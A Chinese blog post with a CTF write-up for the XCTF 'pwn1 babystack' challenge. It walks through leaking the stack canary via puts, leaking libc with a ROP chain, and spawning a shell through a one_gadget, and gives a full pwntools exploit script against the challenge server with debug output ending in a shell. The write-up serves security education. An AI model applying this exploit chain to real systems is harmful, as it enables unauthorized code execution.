XCTF pwn1 babystack

最新推荐文章于 2024-06-19 09:45:30 发布
最新推荐文章于 2024-06-19 09:45:30 发布
阅读量490 收藏 5
点赞数 10
分类专栏: pwn 文章标签: linux python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zwb2603096342/article/details/139122162
版权

checksec看一下保护 

 

Full RELRO代表got表只读,开启了canary,说明可能需要进行泄露canary,接下来看ida

对部分代码有所修改,典型的菜单题目,1是输入,发现s可以进行溢出,也就是说泄露canary和libc基地址,并且控制执行流,2是输出,利用puts遇到\x0才会停止输出,用来接收canary,3是退出程序,进入到我们自己布置的执行流。

大体了解完,整理一下攻击流程:

(1)先泄露canary,那么如何泄露canary呢,下面看脚本。

p.sendlineafter(">> ",'1')
p.sendline(b'a'*0x88)

p.sendlineafter(">> ",'2')#进入到输出
p.recvuntil(b'a'*0x88+b'\n')
canary = u64(p.recv(7).rjust(8,b'\x00'))
print(f'[+][+][+] canary => {hex(canary)}')

先填满canary之前的0x88,再进行到程序的输出地方,recvuntil的换行是因为原程序最下面的print函数中调用了puts函数,puts输出完会在末尾加上换行,这样就可以接收到canary了。注意一下,canary的接收,是rjust,而不是其他的ljust,从右到左补充.

(2)泄露libc基地址,已经有了canary了,那么便可以栈溢出控制执行流了,可以用puts函数来泄露,由于是64位程序,得先获得pop_rdi_ret进行传参

ROPgadget --binary babystack --only "pop|ret" | grep rdi
0x0000000000400a93 : pop rdi ; ret

然后便是泄露puts真实地址了:

p.sendlineafter(">> ",'1')
payload = cyclic(0x88) + p64(canary) + b'a'*8
payload += flat(pop_rdi_ret,puts_got,puts_plt,main)
p.sendline(payload)
p.recv()
p.sendlineafter('>> ','3')#退出程序,控制执行流到我们想要的地方
puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print(f'[+][+][+] puts_address => {hex(puts_addr)}')

base = puts_addr - libc.symbols['puts']#获得基地址

先传递我们的payload,然后退出主程序去执行leave ret(关键的一步,一定要退出主程序!!),到我们布置好的执行流上面,从而获得puts的真实地址,进而获得基地址。

(3)最后,由于题目给了libc版本,那么便可以使用one_gadget去一把梭。(不知道可不可以自己构造system(/bin/sh),我自己写的时候没有成功,是sh not found)

先看onegadget的使用:

zwb@ubuntu:~/Downloads/pwn1$ one_gadget libc-2.23.so
0x45216 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf0274 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1117 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL

根据这上面给出的一个一个去试,constraints是要求.

ok,直接上最后的脚本:

from pwn import*
context(arch='amd64',log_level='debug')
p=remote("61.147.171.105",56918)
elf = ELF("./babystack")
libc = ELF("./libc-2.23.so")
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main = 0x0400908
pop_rdi_ret = 0x0000000000400a93
ret = 0x000000000040067e

#先对menu解析
#1是输入,2是输出,3是退出

#第一部分泄露canary地址
p.sendlineafter(">> ",'1')
p.sendline(b'a'*0x88)

p.sendlineafter(">> ",'2')#进入到输出
p.recvuntil(b'a'*0x88+b'\n')
canary = u64(p.recv(7).rjust(8,b'\x00'))
print(f'[+][+][+] canary => {hex(canary)}')

#第二部分泄露libc基地址
p.sendlineafter(">> ",'1')
payload = cyclic(0x88) + p64(canary) + b'a'*8
payload += flat(pop_rdi_ret,puts_got,puts_plt,main)
p.sendline(payload)
p.recv()
p.sendlineafter('>> ','3')#退出程序,控制执行流到我们想要的地方
puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print(f'[+][+][+] puts_address => {hex(puts_addr)}')

base = puts_addr - libc.symbols['puts']#获得基地址

#给出了libc版本,可以用one_gaget一把梭
onegadget = base + 0x45216
p.sendlineafter(">> ",'1')
payload1 = cyclic(0x88) + p64(canary) + b'a'*8
payload1 += flat(ret,onegadget)
p.sendline(payload1)
p.sendlineafter(">> ",'3')
p.interactive()

发送之后是这个样子的 :

zwb@ubuntu:/mnt/hgfs/ctfpwn/exp$ python3 babystack.py
[+] Opening connection to 61.147.171.105 on port 56918: Done
[*] '/mnt/hgfs/ctfpwn/exp/babystack'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[*] '/mnt/hgfs/ctfpwn/exp/libc-2.23.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
babystack.py:16: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  p.sendlineafter(">> ",'1')
/home/zwb/.local/lib/python3.8/site-packages/pwnlib/tubes/tube.py:841: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[DEBUG] Received 0x2c bytes:
    b'--------\n'
    b'1.store\n'
    b'2.print\n'
    b'3.quit\n'
    b'--------\n'
    b'>> '
[DEBUG] Sent 0x2 bytes:
    b'1\n'
[DEBUG] Sent 0x89 bytes:
    b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n'
babystack.py:19: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  p.sendlineafter(">> ",'2')#进入到输出
[DEBUG] Received 0x1 bytes:
    b'\n'
[DEBUG] Received 0x2c bytes:
    b'--------\n'
    b'1.store\n'
    b'2.print\n'
    b'3.quit\n'
    b'--------\n'
    b'>> '
[DEBUG] Sent 0x2 bytes:
    b'2\n'
[DEBUG] Received 0x93 bytes:
    00000000  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│
    *
    00000080  61 61 61 61  61 61 61 61  0a b3 76 0a  a7 9b f4 0a  │aaaa│aaaa│··v·│····│
    00000090  30 0a 40                                            │0·@│
    00000093
[+][+][+] canary => 0xaf49ba70a76b300
babystack.py:25: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  p.sendlineafter(">> ",'1')
[DEBUG] Received 0x2e bytes:
    b'\n'
    b'\n'
    b'--------\n'
    b'1.store\n'
    b'2.print\n'
    b'3.quit\n'
    b'--------\n'
    b'>> '
[DEBUG] Sent 0x2 bytes:
    b'1\n'
[DEBUG] Sent 0xb9 bytes:
    00000000  61 61 61 61  62 61 61 61  63 61 61 61  64 61 61 61  │aaaa│baaa│caaa│daaa│
    00000010  65 61 61 61  66 61 61 61  67 61 61 61  68 61 61 61  │eaaa│faaa│gaaa│haaa│
    00000020  69 61 61 61  6a 61 61 61  6b 61 61 61  6c 61 61 61  │iaaa│jaaa│kaaa│laaa│
    00000030  6d 61 61 61  6e 61 61 61  6f 61 61 61  70 61 61 61  │maaa│naaa│oaaa│paaa│
    00000040  71 61 61 61  72 61 61 61  73 61 61 61  74 61 61 61  │qaaa│raaa│saaa│taaa│
    00000050  75 61 61 61  76 61 61 61  77 61 61 61  78 61 61 61  │uaaa│vaaa│waaa│xaaa│
    00000060  79 61 61 61  7a 61 61 62  62 61 61 62  63 61 61 62  │yaaa│zaab│baab│caab│
    00000070  64 61 61 62  65 61 61 62  66 61 61 62  67 61 61 62  │daab│eaab│faab│gaab│
    00000080  68 61 61 62  69 61 61 62  00 b3 76 0a  a7 9b f4 0a  │haab│iaab│··v·│····│
    00000090  61 61 61 61  61 61 61 61  93 0a 40 00  00 00 00 00  │aaaa│aaaa│··@·│····│
    000000a0  a8 0f 60 00  00 00 00 00  90 06 40 00  00 00 00 00  │··`·│····│··@·│····│
    000000b0  08 09 40 00  00 00 00 00  0a                        │··@·│····│·│
    000000b9
[DEBUG] Received 0x1 bytes:
    b'\n'
babystack.py:30: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  p.sendlineafter('>> ','3')#退出程序,控制执行流到我们想要的地方
[DEBUG] Received 0x2c bytes:
    b'--------\n'
    b'1.store\n'
    b'2.print\n'
    b'3.quit\n'
    b'--------\n'
    b'>> '
[DEBUG] Sent 0x2 bytes:
    b'3\n'
[DEBUG] Received 0x6 bytes:
    00000000  90 06 f7 19  8c 7f                                  │····│··│
    00000006
[+][+][+] puts_address => 0x7f8c19f70690
babystack.py:38: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  p.sendlineafter(">> ",'1')
[DEBUG] Received 0x2d bytes:
    b'\n'
    b'--------\n'
    b'1.store\n'
    b'2.print\n'
    b'3.quit\n'
    b'--------\n'
    b'>> '
[DEBUG] Sent 0x2 bytes:
    b'1\n'
[DEBUG] Sent 0xa9 bytes:
    00000000  61 61 61 61  62 61 61 61  63 61 61 61  64 61 61 61  │aaaa│baaa│caaa│daaa│
    00000010  65 61 61 61  66 61 61 61  67 61 61 61  68 61 61 61  │eaaa│faaa│gaaa│haaa│
    00000020  69 61 61 61  6a 61 61 61  6b 61 61 61  6c 61 61 61  │iaaa│jaaa│kaaa│laaa│
    00000030  6d 61 61 61  6e 61 61 61  6f 61 61 61  70 61 61 61  │maaa│naaa│oaaa│paaa│
    00000040  71 61 61 61  72 61 61 61  73 61 61 61  74 61 61 61  │qaaa│raaa│saaa│taaa│
    00000050  75 61 61 61  76 61 61 61  77 61 61 61  78 61 61 61  │uaaa│vaaa│waaa│xaaa│
    00000060  79 61 61 61  7a 61 61 62  62 61 61 62  63 61 61 62  │yaaa│zaab│baab│caab│
    00000070  64 61 61 62  65 61 61 62  66 61 61 62  67 61 61 62  │daab│eaab│faab│gaab│
    00000080  68 61 61 62  69 61 61 62  00 b3 76 0a  a7 9b f4 0a  │haab│iaab│··v·│····│
    00000090  61 61 61 61  61 61 61 61  7e 06 40 00  00 00 00 00  │aaaa│aaaa│~·@·│····│
    000000a0  16 62 f4 19  8c 7f 00 00  0a                        │·b··│····│·│
    000000a9
babystack.py:42: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  p.sendlineafter(">> ",'3')
[DEBUG] Received 0x1 bytes:
    b'\n'
[DEBUG] Received 0x2c bytes:
    b'--------\n'
    b'1.store\n'
    b'2.print\n'
    b'3.quit\n'
    b'--------\n'
    b'>> '
[DEBUG] Sent 0x2 bytes:
    b'3\n'
[*] Switching to interactive mode
$ ls
[DEBUG] Sent 0x3 bytes:
    b'ls\n'
[DEBUG] Received 0x34 bytes:
    b'babystack\n'
    b'bin\n'
    b'dev\n'
    b'flag\n'
    b'lib\n'
    b'lib32\n'
    b'lib64\n'
    b'libc-2.23.so\n'
babystack
bin
dev
flag
lib
lib32
lib64
libc-2.23.so

 

最后的总结:

(1)一定先理清好攻击的思路一步一步去执行

(2)弄清好如何获得canary和泄露libc,明确执行流!! 

蒟蒻zwb
关注
  • 10
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn1 babystack [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列19
重新启程
12-25 1559
题目地址:pwn1 babystack 已经到了高手进阶区的第八题了,已经渐入佳境了。哈哈! 废话不说,看看题目先 厦门邀请赛的题目,还是2星难度,那就开工了。 管理检查一下保护机制: [*] '/ctf/work/python/pwn1/babystack' Arch: amd64-64-little RELRO: Full RELRO Stac...
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
xctf pwn1
qq_41071646的博客
05-14 947
这个题目我不知道为什么在网址上面没有打通 我只能在本机上玩了 本机的库是 2.23 所以我也按照 2.23来打了 然后这个题 可以用system 也可以用 one_gadget 用的是 one_gadget 然后说一下这个题 看起来 就是一个简单的 x64的栈溢出 然后我们看一下保护 这里面 有一个 canary 需要绕过的 其实看ida 也能看出来 v6就是我...
XCTF PWN高手进阶区之babystack
neuisf的博客
01-30 468
此题,开启了RELRO、NX、CANARY,未开启PIE,只有read函数溢出存在溢出可能。 第一,泄露canary,程序会通过puts函数输出缓冲区s的内容。puts函数在输出时,只有遇到\0才会结束,而缓冲区s又和main函数的canary相连,此时,输入和缓冲区大小相等的字符串,溢出的\n将会覆盖canary的第一字节00,从而将canary的后三个字节输出,构建canary。 第二,获取s...
xctf-pwn-“stack2 & pwn1 & welpwn”
njh18790816639的博客
07-30 181
stack2 首先探测一番,是32位,看下保护! ida静态分析一番! 还有个后门函数: 原先先要使用这个后门函数,但是发现远程服务器是没有bash的,所以这个后门函数是没有用的,误导我等! 不过还是先按正常思路来说,这第三个函数是没有检查数据的合法性的。 ...
攻防世界pwn——pwn1
qq_62076255的博客
12-21 431
做题记录
BUUCTF pwn actf_2019_babystack
zwb2603096342的博客
05-29 400
buuctf pwn,典型的ret2libc和栈迁移的结合
ADworld pwn wp - pwn1
fa1c4的blog
06-26 174
不过问题在于开了canary所以溢出有难度, 不过v6是canary保存的变量, 而且栈位置在s数组的高位, 所以可以通过puts()泄露出canary, puts函数是打印直到’\0’字符为止, 所以溢出可行, 劫持执行流到ROP泄露puts函数地址, 计算出libc基址, 然后调用execve() 这里用one_gadget, 坑点在于记得计算服务器上的execve地址 from pwn import * from pwnlib import context from pwnlib.util.c...
XCTF-4th-QCTF-2018-babyrsa
MangoFengC++
03-17 601
题目 Baby RSA e = 0x10001 n = 0x0b765daa79117afe1a77da7ff8122872bbcbddb322bb078fe0786dc40c9033fadd639adc48c3f2627fb7cb59bb0658707fe516967464439bdec2d6479fa3745f57c0a5ca255812f0884978b2a8aaeb750e0228cbe28a1e5a63bf0309b32a577eecea66f7610a9a4e720649129e9dc2115d
XSCTF联合招新赛(热身赛)babystack & easyrop
红叶的博客
10-29 1611
开启了栈不可执行,但是在 IDA Pro 中发现了backdoor函数。
web 2.11 upload1.md
12-16
xctf
圣徒xctf网站
02-14
圣徒xctf网站概述SaintsXCTF Web应用程序的前端。 这是SaintsXCTF Web应用程序的第二个版本。 前端使用React.js编写,并使用Sass进行样式设置。 API调用通过Nginx代理路由到 。指令在本地启动应用程序首次设置应该...
XMan-MISC-诸葛建伟XCTF-public.pdf
12-04
MISC,中文即杂项,包括隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据等。 竞赛过程中解MISC时会涉及到各种脑洞,各种花式技巧,主要考察选手的快速理解、学习能力以及日常知识积累的广度、深度。...
解决 Linux 和 Java 1.8 中上传中文名称图片报错问题
appearappear的博客
06-12 376
Linux 系统和 Java 1.8 中,当尝试上传含有中文名称的图片时,可能会遇到以下错误提示:为了解决这个问题,可以采取以下方法:在 Docker 的 中添加如下参数:Dockerfile使用以下命令启动 Java 程序,添加 参数:通过以上配置,确保了在启动 Java 程序时,使用了 UTF-8 编码,这样可以正确处理含有中文名称的文件,避免了报错问题的发生。3.5
Linux 6.10也引进了蓝屏机制
最新发布
bugsycrack的博客
06-19 113
Linux 6.10 还在开发之中,最新版本是 rc4,扩展 DRM Panic 支持的工作还在进行之中。未来在运行 Linux 6.10+ 的平台上,如果驱动支持 DRM Panic,那么就可以通过 echo c > /proc/sysrq-trigger 测试 Linux 版本的“蓝屏死机(BSOD)”。Linux 6.10 引入了一个新的 DRM Panic 处理程序基础设施,以便于在致命错误(Panic)发生时显示相关信息。
linux写代码环境和工具
2301_80687320的博客
06-16 904
Linux作为一个自由和开放源码的操作系统,其环境具有高度的灵活性和可定制性。无论是在服务器、桌面应用、嵌入式系统还是云计算等领域,Linux都凭借其出色的性能和稳定性赢得了广泛的认可。本文将深入探讨Linux环境的构建、配置以及其对应用程序和系统性能的影响。一、Linux开发需要什么?1. 学习yum工具,进行软件安装2. 掌握vim编辑器使用,学会vim的简单配置3. 掌握gcc/g++编译器的使用,并了解其过程,原理4. 掌握简单gdb使用于调试。
Linux】进程间通信1——管道概念,匿名管道
2301_80224556的博客
06-16 1082
③写端进程将数据写完后将写端关闭。
[Linux] TCP协议介绍(3): TCP协议的“四次挥手“过程、状态分析...
七月.cc的博客
06-16 991
TCP协议是面向连接的, 面向字节流的, 可靠的 传输层协议...
xctf supersqli
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值